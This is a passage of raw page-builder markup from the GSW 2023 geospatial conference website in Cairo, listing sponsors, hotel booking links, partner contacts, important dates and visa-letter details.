width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 160px !important;}\"]\r\n\r\n<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968955{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>                    Platinum Sponsors</strong></span></h4>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"200\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px 